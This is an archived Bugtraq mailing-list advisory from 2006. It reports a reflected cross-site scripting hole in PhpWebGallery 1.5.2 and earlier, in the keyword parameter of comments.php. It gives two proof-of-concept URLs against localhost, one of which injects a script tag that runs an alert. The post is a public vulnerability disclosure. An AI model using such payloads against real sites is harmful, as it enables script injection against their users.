[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

PhpWebGallery Cross Site Scripting Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PhpWebGallery Cross Site Scripting Vulnerability
From: iss4m.h@xxxxxxxxx
Date: 4 Jul 2006 00:00:03 -0000

Produce : PhpWebGallery <= 1.5.2
Site    : http://www.phpwebgallery.net
Problem : XSS
Greetz  : hasnaa and all friends

Moroccan Security Research Team

Vulnerable file : comments.php

Exploit :

http://localhost/phpwebgallery/comments.php?keyword=%22%3E[XSS]

http://localhost/phpwebgallery/comments.php?keyword=%22%3E%3Cscript%3Ealert('Hi+Master');%3C/script%3E

Contact  : iss4m.h@xxxxxxxxx

Prev by Date: file include exploits in randshop v1.2
Next by Date: Re: file include exploits in randshop v1.2
Previous by thread: Re: file include exploits in randshop v1.2
Next by thread: [Bugtraq] Re: flock d0s exploit remote. beta 1 (v0.7)
Index(es):
- Date
- Thread